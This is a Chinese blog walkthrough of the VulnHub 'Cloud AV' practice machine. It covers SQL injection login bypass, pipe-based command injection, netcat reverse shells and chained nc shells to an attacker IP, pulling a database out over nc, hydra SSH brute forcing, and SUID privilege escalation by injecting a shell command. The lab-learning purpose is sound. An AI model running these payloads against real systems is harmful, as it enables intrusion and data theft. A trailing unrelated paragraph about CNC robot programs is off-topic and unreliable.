easy_cloudantivirus靶机之SQL注入、命令注入、NC串联

靶机地址:
https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/

内容简介:
在这次打靶过程中,我们将使用到以下攻击手段:

端口扫描
WEB侦查
SQL注入
命令注入
密码爆破
代码审计
NC串联
本地提权

主机发现 arping 的使用

for i in $(seq 1 254); do sudo arping -c 2 10.0.0.$i; done

密码注入语句

select * from code where password="; + password + ";

select * from code where password="; + " or 1=1--+ + ";

" or 1=1-- 登录成功,+换成空格。后面有个空格

命令执行

猜测:

输入hello,执行 "avscan hello"

利用管道符拼接命令

avscan hello | id

查找一下nc

hello | which nc

kali 监听

nc -nvlp

弹shell

nc 192.168.111.128 4444 -e /bin/bash

-e : 可以弹出一个终端

发现连接不成功,原因:有的linux发行版中 nc 没有-e的参数

弹shell,基本连接

nc 192.168.111.128 4444

可以成功

nc技巧之nc的串连

nc 192.168.111.128 3333 | /bin/bash | nc 192.168.111.128 4444

nc技巧之文件传输

攻击机

nc -nvlp 5555 > db.sql

靶机

nc 192.168.111.128 5555 < database.sql

打开sqlite

sqlite3

打开db.sql文件

sqlite>.open db.sql

查看db.sql文件

sqlite>.database

下载db.sql文件

sqlite>.dump

在etc/passwd下查找具有ssh登录的账号

cat /etc/passwd | grep /bin/bash

通过dump下来的密码和passwd文件里找到的用户名做一个密码字典进行爆破

用hydra进行爆破

hydra -L user.txt -P pass.txt ssh://10.0.0.1

(没有成功)

进行提权

查找有S权限的文件(update_cloudav.c)

执行update_cloudav.c文件

.update_cloudav "a| nc 10.0.2.7 5555 | /bin/bash | nc 10.0.2.7 6666"

带""为了使update_cloudav认为""内为一个参数

提权成功!!!

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
进玉软件NC串联程式是一种机器人应用技术,用于实现多个机器人之间协同操作和任务分配。它的主要目的是优化生产过程,提高生产效率和品质。 NC串联程式通过将多个机器人相互连接,使它们能够在同一工作站上协同完成一系列任务。这种方式可以充分利用每个机器人的特长,提高整体生产效率。例如,在生产线上,一个机器人可以完成零件的搬运,而另一个机器人可以完成零件的加工。通过串联程式,这两个机器人可以实现无缝衔接,从而提高加工效率。 另外,进玉软件NC串联程式还可以实现任务的分配和自动化调度。生产过程中,不同的任务需要不同的机器人来完成。通过串联程式,可以实现自动化的任务分配,将每个任务分配给最适合的机器人。这样可以减少人工干预,提高生产效率和准确性。 值得一提的是,进玉软件NC串联程式还具有灵活性和可扩展性。在生产过程中,如果需要增加或减少机器人数量,只需简单地修改程式即可实现。这种灵活性可以根据生产需求进行调整,提高生产线的适应性。 总之,进玉软件NC串联程式是一种基于机器协同的生产优化技术,通过连接多个机器人实现任务的协同和分配,提高生产效率和品质,并具备灵活性和可扩展性。这种技术应用将为制造业带来更高的效益和竞争优势。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值